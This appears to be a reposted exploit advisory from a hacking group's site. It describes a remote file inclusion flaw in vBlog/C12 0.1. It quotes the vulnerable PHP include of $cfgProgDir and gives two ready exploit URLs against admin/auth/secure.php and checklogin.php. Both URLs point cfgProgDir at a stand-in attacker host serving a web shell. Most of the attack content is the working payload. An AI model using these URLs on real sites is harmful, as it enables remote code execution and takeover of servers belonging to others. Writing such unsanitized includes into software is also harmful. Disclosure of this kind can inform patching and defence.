vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities
[code]**********************************************************************************************************[url]WwW.Deltahacking.NeT[/url] (Priv8 Site)
[url]WwW.Deltahacking.Ir[/url] (Public Site)
**********************************************************************************************************
* Portal Name :Vortex Blog AKA vBlog
* Class = Remote File Inclusion ;
* Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
* Found by = Dr.Pantagon ([email]rezayavari2006@yahoo.com[/email])
--------------------------------------------------------------------------------------------
--------------
- Vulnerable Code
include($cfgProgDir . "session.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
--------------------------------------------------------------------------------------------
--------------
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha
**********************************************************************************************************
[/code]
页:
[1]